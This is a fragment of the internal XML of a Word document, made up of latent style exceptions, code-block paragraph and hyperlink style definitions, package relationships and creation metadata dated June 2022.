    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 8"/>
    <w:lsdException w:qFormat="true" w:uiPriority="34" w:name="List Paragraph"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 3"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 4"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 5"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 2"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 6"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 2"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 6"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 6"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 4"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 3"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 2"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Balloon Text"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 1"/>
    <w:lsdException w:qFormat="true" w:uiPriority="11" w:name="Subtitle"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 4"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 5"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 1"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Unresolved Mention"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 9"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Signature"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Acronym"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Top of Form"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 8"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="endnote reference"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 3"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 4"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 1"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal Table"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Definition"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 3"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 3"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Theme"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 6"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 6"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 4"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 5"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="21" w:name="Intense Emphasis"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 1"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 2"/>
    <w:lsdException w:semiHidden="true" w:name="Placeholder Text"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 6"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 5"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 5"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 6"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 1"/>
    <w:lsdException w:qFormat="true" w:uiPriority="29" w:name="Quote"/>
    <w:lsdException w:uiPriority="42" w:name="Plain Table 2"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal Indent"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 1"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 2"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Subtle 2"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 3"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 5"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Sample"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 1"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 6"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Closing"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 2"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 3"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 3"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="endnote text"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 5"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 4"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 5"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 1"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="table of authorities"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="header"/>
    <w:lsdException w:qFormat="true" w:uiPriority="1" w:name="No Spacing"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 2"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 2"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 2"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 3"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Contemporary"/>
    <w:lsdException w:uiPriority="40" w:name="Grid Table Light"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 1"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation subject"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="37" w:name="Bibliography"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 4"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 3"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Bottom of Form"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 6"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 3"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 1"/>
    <w:lsdException w:qFormat="true" w:uiPriority="33" w:name="Book Title"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 6"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 1"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 2"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 2"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 2"/>
    <w:lsdException w:qFormat="true" w:uiPriority="32" w:name="Intense Reference"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 3"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 4"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 6"/>
    <w:lsdException w:name="heading 6" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="envelope return"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Elegant"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 5"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 2"/>
    <w:lsdException w:qFormat="true" w:uiPriority="22" w:name="Strong"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 2"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 4"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 2"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Document Map"/>
    <w:lsdException w:name="heading 7" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:name="heading 4" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 2"/>
    <w:lsdException w:name="heading 2" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 5"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 2"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 1"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 5"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 3"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 2"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="envelope address"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Keyboard"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 5"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 1"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 4"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 3"/>
    <w:lsdException w:qFormat="true" w:uiPriority="9" w:name="heading 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="No List"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 6"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Message Header"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent 2"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 2"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 5"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 2"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 2"/>
  </w:latentStyles>
  <w:style w:styleId="rkeh5z" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="w44gjl"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="6eg18n" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="eavuvl"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="w44gjl" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="lpjq4z" w:type="character">
    <w:name w:val="melo-codeblock-Base-theme-char"/>
    <w:basedOn w:val=""/>
    <w:next w:val=""/>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>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 w:styleId="fxtchg" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="cx019l"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="1bilxi" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="l0w2lf"/>
    <w:next w:val=""/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="true"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="1E6FFF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="hnd0eb" w:type="paragraph">
    <w:name w:val="melo-codeblock-Normal-theme-para"/>
    <w:basedOn w:val="sxn3vx"/>
    <w:next w:val=""/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="c4c15d" w:default="true" w:type="character">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>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cepcot" w:type="character">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="fhbhlo"/>
    <w:next w:val=""/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="true"/>
    <w:rPr>
      <w:color w:themeColor="hyperlink" w:val="1E6FFF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="eavuvl" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="ablt93" w:default="true" w:type="paragraph">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="4eedb4" w:default="true" w:type="numbering">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:styleId="cx019l" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="sxn3vx" w:type="paragraph">
    <w:name w:val="melo-codeblock-Base-theme-para"/>
    <w:basedOn w:val="ablt93"/>
    <w:next w:val=""/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="360" w:after="0" w:before="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Monaco" w:eastAsia="Monaco" w:hAnsi="Monaco" w:ascii="Monaco"/>
      <w:color w:val="000000"/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="l0w2lf" w:default="true" w:type="character">
    <w:name w:val="Default Paragraph Font"/>
    <w:basedOn w:val=""/>
    <w:next w:val=""/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden w:val="true"/>
    <w:unhideWhenUsed w:val="true"/>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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.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2022-06-21T09:19:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-21T09:19:48Z</dcterms:modified>
</cp:coreProperties>
</file>